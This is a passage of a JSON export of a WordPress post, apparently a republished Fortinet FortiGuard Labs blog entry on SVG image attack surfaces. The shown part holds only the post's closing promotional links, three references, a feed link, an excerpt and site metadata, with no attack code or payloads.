href=\"https:\/\/www.fortinet.com\/support-and-training\/support-services\/fortiguard-security-subscriptions.html?utm_source=blog&amp;utm_campaign=2018-blog-security-services\">portfolio<\/a>.\u00a0<a href=\"https:\/\/www.fortinet.com\/fortiguard\/threat-intelligence\/threat-research.html?utm_source=nreleaseblog&amp;utm_campaign=2018-q2-fortiguardlabs-cta\">Sign up<\/a>\u00a0for our weekly FortiGuard Threat Brief.<\/i><\/p>\n<p><i>Read about the FortiGuard\u00a0<a href=\"https:\/\/www.fortinet.com\/support-and-training\/support-services\/fortiguard-security-subscriptions\/security-rating.html?utm_source=blog&amp;utm_campaign=2018-blog-security-rating-service\">Security Rating Service<\/a>, which provides security audits and best practices.<\/i><\/p>\n<h2>References<\/h2>\n<p>[1] W3C, \u201cScalable Vector Graphics\u201d <a href=\"https:\/\/www.w3.org\/TR\/SVG2\/\">https:\/\/www.w3.org\/TR\/SVG2\/<\/a> (02 September, 2019)<br \/> [2] OWASP, \u201cThe Image that called me\u201d <a href=\"https:\/\/www.owasp.org\/images\/0\/03\/Mario_Heiderich_OWASP_Sweden_The_image_that_called_me.pdf\">https:\/\/www.owasp.org\/images\/0\/03\/Mario_Heiderich_OWASP_Sweden_The_image_that_called_me.pdf<\/a> (02 September, 2019)<br \/> [3] Blackhat, \u201cExploiting Browsers without Image Parsing Bugs\u201d <a href=\"https:\/\/www.blackhat.com\/docs\/us-14\/materials\/us-14-DeGraaf-SVG-Exploiting-Browsers-Without-Image-Parsing-Bugs.pdf\">https:\/\/www.blackhat.com\/docs\/us-14\/materials\/us-14-DeGraaf-SVG-Exploiting-Browsers-Without-Image-Parsing-Bugs.pdf<\/a> (02 September, 2019)<\/p>\n<\/p><\/div>\n<div class=\"raw-import aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"text-container\">\n<div id=\"om-qxx1b0gslklfu2kjckea-holder\"><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<p><a href=\"http:\/\/feedproxy.google.com\/~r\/fortinet\/blog\/threat-research\/~3\/tSFgpsLgsgM\/scalable-vector-graphics-attack-surface-anatomy.html\" target=\"bwo\" 
>http:\/\/feeds.feedburner.com\/fortinet\/blog\/threat-research<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"\/blog\/threat-research\/scalable-vector-graphics-attack-surface-anatomy\/_jcr_content\/root\/responsivegrid\/image_1192764442.img.png\/1573069642100\/svg-one.png\"\/><br \/>Learn about the common attack surfaces for SVG images observed by the FortiGuard Labs team as they assess web applications with embedded SVG images.&lt;img src=&#8221;http:\/\/feeds.feedburner.com\/~r\/fortinet\/blog\/threat-research\/~4\/tSFgpsLgsgM&#8221; height=&#8221;1&#8243; width=&#8221;1&#8243; alt=&#8221;&#8221;\/&gt;<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10424,10378],"tags":[],"class_list":["post-16824","post","type-post","status-publish","format-standard","hentry","category-fortinet","category-security"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/16824","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=16824"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/16824\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=16824"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=16824"},{"taxonomy":"post_tag","embeddab
le":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=16824"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}